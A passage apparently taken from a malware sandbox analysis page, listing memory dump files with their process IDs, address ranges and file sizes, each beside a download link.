Filesize
4KB

Download
memory/3424-142-0x0000000005C00000-0x0000000005C66000-memory.dmp

Filesize
408KB

Download
memory/3896-148-0x00000196A7B60000-0x00000196A7B70000-memory.dmp

Filesize
64KB

Download
memory/3896-149-0x00000196A82E0000-0x00000196A82F0000-memory.dmp

Filesize
64KB

Download
memory/3896-150-0x00000196AA7B0000-0x00000196AA7B4000-memory.dmp

Filesize
16KB

Download
memory/4472-155-0x0000000000400000-0x00000000005D4000-memory.dmp

Filesize
1.8MB

Download
memory/4472-154-0x0000000000400000-0x00000000005D4000-memory.dmp

Filesize
1.8MB

Download
memory/5052-156-0x0000000003F80000-0x0000000004154000-memory.dmp

Filesize
1.8MB

Download
memory/5116-180-0x00000000721EE000-0x00000000721EF000-memory.dmp

Filesize
4KB

Download
memory/5116-181-0x0000000000E30000-0x0000000000E31000-memory.dmp

Filesize
4KB

Download
memory/5116-182-0x0000000000E32000-0x0000000000E33000-memory.dmp

Filesize
4KB

Download